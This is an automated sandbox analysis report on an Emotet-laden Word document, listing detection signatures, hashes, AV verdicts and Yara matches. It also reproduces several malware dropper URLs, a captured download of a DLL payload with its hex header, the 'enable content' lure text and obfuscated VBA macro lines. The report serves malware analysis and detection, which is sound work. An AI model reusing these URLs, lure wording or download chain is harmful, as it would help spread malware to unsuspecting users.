Analysis Report bestand-8881014518 00944.doc

Overview

General Information

Sample Name: bestand-8881014518 00944.doc
Analysis ID: 336501
MD5: 8ce4185f17ed35f43462f2f44c1cfc3d
SHA1: 9c6396150dd23a65c36e84af69e15543cedca4d2
SHA256: 4425de724449dedb3b183a3bfd567f9d3449c2457a1e2fd695019b1b6227e035

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: https://fnjbq.com/wp-includes/rlR/ Avira URL Cloud: Label: malware
Source: http://wap.zhonglisc.com/wp-includes/QryCB/ Avira URL Cloud: Label: malware
Source: http://petafilm.com/wp-admin/4m/ Avira URL Cloud: Label: malware
Source: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: petafilm.com Virustotal: Detection: 6%
Source: http://petafilm.com Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: bestand-8881014518 00944.doc Virustotal: Detection: 31%
Source: bestand-8881014518 00944.doc ReversingLabs: Detection: 47%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt, 7_2_100011C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree, 7_2_100021F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree, 7_2_10002730
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: petafilm.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 176.53.69.151:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 176.53.69.151:80

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in memory: http://petafilm.com/wp-admin/4m/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in memory: http://givingthanksdaily.com/qlE/VeF/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in memory: http://wap.zhonglisc.com/wp-includes/QryCB/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in memory: https://fnjbq.com/wp-includes/rlR/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in memory: https://somanap.com/wp-admin/P/
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheContent-Type: application/octet-streamExpires: Wed, 06 Jan 2021 07:53:49 GMTLast-Modified: Wed, 06 Jan 2021 07:53:49 GMTServer: Microsoft-IIS/10.0Set-Cookie: 5ff56c8d1a339=1609919629; expires=Wed, 06-Jan-2021 07:54:49 GMT; Max-Age=60; path=/Content-Disposition: attachment; filename="bLH.dll"Content-Transfer-Encoding: binaryX-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Wed, 06 Jan 2021 07:53:48 GMTContent-Length: 192000Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /wp-admin/4m/ HTTP/1.1 Host: petafilm.com Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 176.53.69.151 176.53.69.151
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RADORETR RADORETR
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BCD43F3-025D-4403-9DBE-B492A11253DC}.tmp
Source: global traffic HTTP traffic detected: GET /wp-admin/4m/ HTTP/1.1 Host: petafilm.com Connection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: petafilm.com
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in binary or memory: http://givingthanksdaily.com/qlE/VeF/
Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2102033680.0000000003A65000.00000004.00000001.sdmp String found in binary or memory: http://petafilm.com
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in binary or memory: http://petafilm.com/wp-admin/4m/
Source: powershell.exe, 00000005.00000002.2094280611.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099067500.00000000027A0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in binary or memory: http://wap.zhonglisc.com/wp-includes/QryCB/
Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2094280611.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099067500.00000000027A0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000008.00000002.2097194758.0000000001D20000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in binary or memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in binary or memory: https://fnjbq.com/wp-includes/rlR/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in binary or memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in binary or memory: https://somanap.com/wp-admin/P/

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 00000009.00000002.2098442031.00000000003A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2346389267.00000000003D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2095140776.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2108654595.00000000020A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2099597236.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2095230919.0000000000261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2107302523.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2096491142.0000000000241000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2104856163.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2346371672.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2101735840.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2101060119.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2101000772.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2107439959.0000000000231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2101688824.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2108653259.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2103856048.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2099670858.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2098319985.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2106854955.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2108749500.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2104985518.0000000000261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2096383511.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2103936335.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 13.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.3d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.20a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , Word
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , Words:3 N@m 13 ;a 10096 G
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Document contains an embedded VBA macro with suspicious strings
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE") Name: Bp63ahh3hb4hyq
